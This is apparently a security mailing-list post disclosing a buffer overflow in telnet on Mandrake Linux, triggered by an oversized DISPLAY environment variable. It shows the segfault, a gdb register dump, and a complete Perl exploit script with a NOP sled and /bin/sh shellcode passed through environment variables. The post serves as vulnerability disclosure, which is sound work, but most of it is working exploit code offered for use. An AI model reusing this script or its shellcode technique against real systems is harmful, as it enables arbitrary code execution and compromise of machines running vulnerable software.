Hi ,
as the distro become more stable I wanna to see some exploitable security
hole the first one that work with mandrake is a telnet bug overflow :
export DISPLAY=`perl -e 'print "A"x2000'`
[root@localhost /root]# telnet localhost
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
Segmentation fault (core dumped)
Not good now using gdb :
Core was generated by `telnet localhost'.
Program terminated with signal 11, Segmentation fault.
#0 0x400bd621 in ?? ()
(gdb) info all-registers
eax 0x806a238 134652472
ecx 0x41413681 1094792833
edx 0x4014bfe0 1075101664
ebx 0x4014d8e0 1075108064
esp 0xbfffcd04 0xbfffcd04
ebp 0xbfffcd5c 0xbfffcd5c
esi 0x8069bb8 134650808
edi 0x100000 1048576
eip 0x400bd621 0x400bd621
eflags 0x10286 66182
so eip successfully overwriten ;-)
thus arbitrary code could be spawned.
so this is a perl that should automat this (but since telnet is no running
with a lot of privilege I've doesn't found any serious probs )
if someone does tell me it ;-)
this is a perl that try to change environment variable via this bug :
#!/usr/bin/perl
# Generic exploit program in perl, which clears the environment to take
# away the need for offset guessing.
$egg = "\x90" x 1500;
$egg .="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76";
$egg .= "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b";
$egg .= "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff";
$egg .= "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff";
$egg .= "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
$egg .= "\x02\x02\x02/bin/sh.-c.sh";
foreach $key (keys %ENV) {
delete $ENV{$key};
}
$buf="";
for ($i = 0; $i < 2000; $i++) {
$buf .= "\x01\xda\xbf\xbf";
}
# Put here your use for $buf, the string to exploit the vulnerable program
with$
$ENV{"DISPLAY"} = $buf;
$ENV{"egg"} = $egg;
system("/usr/bin/telnet localhost");
printf("Exploit done\n");
